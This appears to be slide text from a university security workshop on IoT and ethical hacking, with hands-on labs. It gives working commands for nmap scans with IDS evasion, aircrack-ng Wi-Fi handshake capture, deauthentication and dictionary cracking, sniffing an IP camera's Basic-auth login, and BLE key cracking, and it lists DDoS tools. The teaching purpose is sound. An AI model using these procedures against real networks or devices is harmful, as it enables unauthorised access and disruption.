Download here - iTrust

Prepared by:
Jing Hui, Ivan, Syuqri and Claudia
1
Acknowledgement
IMPORTANT
iTrust acknowledges that any and all software and/or tools presented in this
workshop are the sole property of their respective trademark / registered /
copyright owners.
2
Warning !
Please do not use the tools provided for unethical purposes.
3
Time
Agenda
9.00 – 9.30am
Introduction to iTrust and the Internet of Things (IoT)
9.30 – 10.30am
Introduction to Networking
10.30 – 10.45am
Break
10.45 – 12.30am
Ethical Hacking and Cyber Security
12.30 – 1.30pm
Lunch
1.30 – 3.30pm
Compromising IoT Devices 1
3.30 - 345pm
Break
3.45 – 4.45pm
Compromising IoT Devices 2
4.45 – 4.55pm
Closing
4.55 – 5.25pm
Tour of iTrust labs
5.25 – 5.30pm
Workshop evaluation
4
Who are we?
Funding
CPS
Focus Areas
Enterprise Security
IoT
Distinctive
Values
Collaborators
5
Section 1
Before We Start….
6
Cyber Security Considerations
Infrastructure (e.g. banking, energy, water,
transport)
Company (e.g. wireless vulnerability, secured
networks)
Personal (e.g. data privacy, cybercrime)
7
Introduction to IoT
• What is IoT ?
The internet of things (IoT) is the network of physical devices, vehicles,
buildings and other items—embedded with electronics, software,
sensors, actuators, and network connectivity that enable these objects
to collect and exchange data.
Compromised IoT devices
IoT - Problems
• Additional attack vectors for hackers to compromise.
• As this is something relatively new, no proper methods or standards
for securing such device.
• When talking about IoT security, should we be concern about the
privacy issues as well ?
Section 2
Networks
11
http://25ffhnaechrbzwf3.onion/
Network – LAN / WAN
13
Network – LAN / WAN
14
Network – IP / MAC Address
15
Network – IP / MAC Address
16
How the internet works
17
OSI 7 Layers
18
OSI 7 Layers
19
Types of Protocol
20
What is a Wireless
• Wireless networking is a method by which homes,
telecommunications networks and enterprise (business) installations
avoid the costly process of introducing cables into a building, or as a
connection between various equipment locations.
21
Types of wireless transmission
There are 3 different ranges for wireless transmission
Short-range
• Infrared
• Bluetooth
Medium-range
• 802.11a/b/g/n/AC
Long-range
• Worldwide Interoperability for Microwave Access or WiMAX
• Global System for Mobile Communications or GSM
22
Wireshark
• Wireshark is a network packet/protocol analyzer.
• A network packet analyzer will try to capture network
packets and tries to display that packet data as
detailed as possible.
23
• Exercise 1 – Wireshark
1. Observe network traffic
2. Find the 3 way handshake
3. Dissect the skype pcap file to see what information can one find
Summary
• What is a LAN/WAN ?
• Components of a network
• How does the internet function ?
• Wireless communication and monitoring
• Wireshark
Section 3
Introduction To Ethical Hacking
26
Introduction To Ethical Hacking
27
Hacking Phases
28
Cyber Kill Chain
29
Objectives of Reconnaissance
30
Types of Scanning
31
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
• AdminR privilege – ICMP ping sweep, ARP ping, ICMP TIMESTAMP message & TCP
ping @ port 80 & 443
• Non-AdminR privilege – TCP ping only
•
•
•
•
-sn : skip port scanning
-PE : skip ARP resolution
--send-ip <IP Addr> : only for same segment else ignore
e.g. : nmap –sn –PE –send-ip x.x.x.x
Caution : IDS monitoring (e.g. Snort – snort.org)
32
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
• Hybrid-type of attack (ARP, ICMP & TCP)
• e.g. nmap –Pn –sS –p 22 –open x.x.x.x/24
• -Pn : ignore host discovery, scan default 1,000 common ports
• -sS –p 22 –open : only output hosts that have port 22 open
• x.x.x.x/24 : network segment identity
Caution : Scanning large numbers of ports is dangerous
33
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
•
•
•
•
•
-oG : tab-delimited output file
-oX : XML output file
-oA : all formats output file
-f : fragment the packets (to avoid simple packet-filtering device/IDS)
-D : decoy (decoy addr must be alive, otherwise SYN-flood & DOS conditions)
• e.g.
• Nmap –sF x.x.x.x/24 –oN outputfile
• nmap –sS x.x.x.x –D y.y.y.y
Caution : Sophisticated/modern packet-filtering devices & application-based
firewall will queue all IP fragments
34
Denial of Service (DOS) Attack
35
Symptoms of DOS Attack
Unavailability of website
Inability to access any website
Unusual slow network performance
Dramatic increase in email spams
36
Type of DOS / DDOS
Volume Based Attacks
Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal
is to saturate the bandwidth of the attacked site, and magnitude is measured in bits
per second (Bps).
Protocol Attacks
Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and
more. This type of attack consumes actual server resources, or those of
intermediate communication equipment, such as firewalls and load balancers,
and is measured in Packets per second.
Application Layer Attacks
Includes Slowloris, Zero-day DDoS attacks, DDoS attacks that target Apache, Windows
or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and
innocent requests, the goal of these attacks is to crash the web server, and the
magnitude is measured in Requests per second.
37
DDOS Attack (Case Study)
38
DDOS Attack (Case Study)
39
DDOS Attack Tools
• LOIC - Low Orbit Ion Canon (sourceforge.net/projects/loic/)
• XOIC (sourceforge.net/projects/xoic/)
• HULK - HTTP Unbearable Load King (packetstormsecurity.com/files/112856/HULK-Http-UnbearableLoad-King.html)
• DDOSIM - Layer 7 DDOS Simulator (sourceforge.net/projects/ddosim/)
• R-U-Dead-Yet (code.google.com/p/r-u-dead-yet/)
• TOR’s Hammer (packetstormsecurity.com/files/98831/)
40
DDOS Hands-On
LOIC - Low Orbit Ion Canon
41
Understanding Malwares
Virus. A computer virus attaches itself to a program or file enabling it to spread from one computer to another,
leaving infections as it travels.
Worm. A sub-class of a virus. It has the capability to travel without any human action. A worm takes
advantage of file or information transport features on your system, which is what allows it to travel
unaided.
Trojans. Malicious code to cause serious damage by deleting files and destroying information on your
system. It can create a backdoor on your computer that gives malicious users access to your system,
possibly allowing confidential or personal information to be compromised. Does not reproduce or selfreplicate.
A blended threat is a more sophisticated attack that bundles some of the worst aspects of viruses, worms, Trojan
horses and malicious code into one single threat. (APT)
42
Advanced Persistent Threat (APT)
• An advanced persistent threat (APT) is a network attack in which an
unauthorized person gains access to a network and stays there
undetected for a long period of time. The intention of an APT attack is
to steal data rather than to cause damage to the network or
organization. APT attacks target organizations in sectors with highvalue information, such as national defense, manufacturing and the
financial industry.
43
Data Exfilitration Using Advanced Techniques
https://www.youtube.com/watch?v=RChj7Mg3rC4
Summary
• Cyber kill chain
• Nmap
• What is a botnet, DDoS ?
• Malware classification
• APTs and how do they steal data from an organization
Section 4
Introduction To Cyber Security
46
Encryption
47
Encryption
• What is encryption ?
48
Caesar’s Cipher
• Each letter is replaced by a letter some fixed number of positions
down the alphabet.
Encryption
• Take for example, the encryption algorithm known as AES allows for
keys up to 256 bits.
• The formula for counting key spaces as such
Number of keys =2𝑥
Where X equals to the number of bits
• Let us take for an example, an RSA algorithm with 2048 bits
• The decimal representation will be,
3.231700607131100730071487668867𝑒 616
50
Symmetric Encryption
• All algorithms of the symmetric variety use a SINGLE key to encrypt
and decrypt information.
• In traditional cryptographic systems, the same key is used by the
sender and receiver to both encrypt and decrypt the message.
• Some of the more common algorithms used are, 3DES, AES and
Blowfish.
51
Asymmetric Encryption
52
RSA Algorithm
In RSA, this asymmetry is
based on the practical
difficulty of factoring the
product of two large prime
numbers
53
Key Signing Exercise
• https://www.cs.drexel.edu/~introcs/Fa11/notes/10.1_Cryptography/
RSAWorksheetv4d.html - asymmetric
• https://encipher.it/ - symmetric
54
Hashing
• Difference between encryption and hashing ?
55
Password Cracker
Hands-on
Hash Generator
56
Salting
57
Salting
• In cryptography, a salt is random data that is used as an additional
input to a one-way function that hashes a password or passphrase.
The primary function of salts is to defend against dictionary attacks
versus a list of password hashes and against pre-computed rainbow
table attacks.
58
In Conclusion
IS ENCRYPTION ENOUGH ?!
Reuters reported in December that the NSA had paid RSA $10 million
to make a now-discredited cryptography system the default in software
used by a wide range of Internet and computer security programs. The
system, called Dual Elliptic Curve, was a random number generator, but
it had a deliberate flaw - or "back door" - that allowed the NSA to crack
the encryption.
59
Summary
• Encryption, symmetric and asymetric
• Hashing
• Difference between encryption and hashing
• Brute force attacks, dictionary attacks and pass the hash
Section 5
The Internet of Not Really Secure Things
61
Top 10 vulnerabilities for IoT
Communications in IoT
WiFi Recap
• 802.11 Standard
• Suitable for long range communication
• Now, let’s discuss about its security…
Security concerns for Wifi
• WEP
• WPA
• WPA2
Bluetooth
• Short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485
GHz
• Communicate with a maximum of seven devices in a piconet (an adhoc computer network using Bluetooth technology)
• Key pairing mechanisms
Security concerns for Bluetooth
• Prior to Bluetooth v2.1, encryption is not required and can be turned
off at any time
• Key pairing mechanism can be sniffed and decrypted easily
IP Camera Exercise
Objectives
• Get access into the network
• Identify the IP camera that has been assigned (via MAC address)
• Identify traffic that is essential for getting access to IP camera’s
stream
What is a MAC address?
• Media access control address, also called a physical address
• Unique identifier assigned to network interfaces for communications
on the physical network segment
• OUI – Organizationally Unique Identifier
• Purchased by a vendor/manufacturer and assigned by Institute of
Electrical and Electronics Engineers (IEEE)
00:1B:2F:BB:4C:98
OUI
Cracking Wi-Fi password
Step 0
• Type ifconfig to find the wireless interface name ie wlan*
• Navigate to appropriate directory in the terminal
• cd Desktop > cd Scy\ Phy/ > cd Wi\ Fi/
• This will navigate it into the Scy Phy > Wi Fi folder
Step 1 – Starting monitor mode
• You are required to sniff the wireless traffic to determine which
network do you want to gain access to.
• For wireless networks, we will be using a suite of tools called Aircrackng.
• To go into monitor mode, use the command ‘sudo airmon-ng start
XXX’ where XXX is the interface which you would like to use.
Step 2 – Identify MAC address of AP
• Use the airodump-ng command in the terminal
• Command: sudo airodump-ng <interface name>
• This will show you a list of available access points and their respective
MAC address
• Do take note of the MAC address of the target access point (AndroidAP)
Step 3 – Capturing packets using airodump
• Firstly, navigate to a folder of choice to store the captured packets
• Example: cd Desktop
• Use the airodump-ng command in the terminal as follows
• sudo airodump-ng -c <channel> --bssid <MAC address of AP> -w <name of output file>
<interface name>
• This will start a capture of packets on the access point
Step 4 – Deauthentication using aireplay
• This will prompt a reconnection of a target device to the network
• Why do we want to do this?
• Use the command as follows
•
sudo aireplay-ng -0 1 -c <MAC of target device> -a <MAC of AP> -e <Access point name> <interface name> --ignorenegative-one
• This will deauthenticate the target device and make it reconnect to the
access point.
Step 5 – Deauthentication using aireplay
• This will prompt a reconnection of a target device to the network
• Why do we want to do this?
• Use the command as follows
•
sudo aireplay-ng -0 1 -c <MAC of target device> -a <MAC of AP> -e <Access point name> <interface name> --ignorenegative-one
• This will deauthenticate the target device and make it reconnect to the
access point.
• Do the deauthentication attack multiple times to ensure that a fourway handshake is captured
Step 6 – Cracking password using aircrack
• This will be done using a dictionary attack
• Do you remember what a dictionary attack is?
• Use the command as follows
• sudo aircrack-ng -w <password list file> -b <MAC of access point> <name of .cap file you have saved>
• If the cracking is successful, a password can be seen in the terminal
window
• Congratulations on cracking the password! 
Hacking IP Camera
Step 1 – Nmap scan on network
• Use Nmap to do a quick scan on the
network
• nmap –T4 –F 192.168.0.0/24
• Identify target MAC address
• B0:C5:54:xx:xx:xx
• Take note of the ports and services
as well
Sample Nmap quick scan output
What is RTSP?
• Real Time Streaming Protocol (RTSP)
• Network control protocol designed for use in entertainment and
communications systems to control streaming media servers
• The protocol is used for establishing and controlling media sessions
between end points.
Step 2 – Sniffing traffic using Wireshark
• Use Wireshark to sniff traffic
• Filter traffic based on IP address
• ip.addr == 192.168.0.xxx
• Get useful information from traffic
• Hint: Remember Nmap ports and services?
Sample Wireshark capture
Step 3 – Understanding the HTTP stream
• In the stream, you should notice that there is something called
“Authorization: Basic ……”
• HTTP Basic authentication (BA) implementation is the simplest
technique for enforcing access controls to web resources because it
doesn't require cookies, session identifiers, or login pages; rather,
HTTP Basic authentication uses standard fields in the HTTP header,
obviating the need for handshakes.
• Usually, the string of data is usually Base 64 encoded.
Step 3 – Accessing camera’s settings
• Input IP address into web browser
• Example - 192.168.0.xxx
• This should prompt a login popup
• Verify success of prior procedures by keying in log in details
Step 4 – Figuring out what else we can do
• Remember the results of the Nmap scan?
• What other protocols or services are there?
Discussion
• Defence techniques ?
• How can one mitigate the attacks we just performed ?
Password Guidelines
•
•
•
•
The longer the password, the harder it is to crack
Always use a combination of characters, numbers and special characters
Variety in passwords
What to avoid while selecting your password
•
•
•
•
dictionary word
easy to guess names and numbers
sequence or repeated characters
worst password list (password, 123456, 111111, iloveyou, etc)
• Question: Longer or complex better?
87
Password Guidelines
Fitbit
• Used to use unencrypted communication channel
• Synchronizes automatically with the mobile device over BLE
• So what does all this translate to for an attacker ?
Fitbit exercise
• Convert the fitbit.psd to fitbit.pcap using tibtle2pcap.py
• Dowloadable from https://github.com/joswr1ght/tibtle2pcap
• python tibtle2pcap.py fitbit.psd output.pcap
• wireshark output.pcap
Crackle – Tool for cracking BLE pairing keys
•
•
•
•
•
Cracks BLE key exchange
Exploits a flaw in the pairing mechanism
Brute force the TK and derive all further keys
Can even obtain the LTK
Decrypt the entire communication
Discussion
• Privacy issues ?
• How can an activity tracker be better designed ?
Conclusion
• Thoughts on IoT
• Security and privacy concerns brought by IoT
• Next gen malwares
Questions ?
Email : [email protected] & [email protected]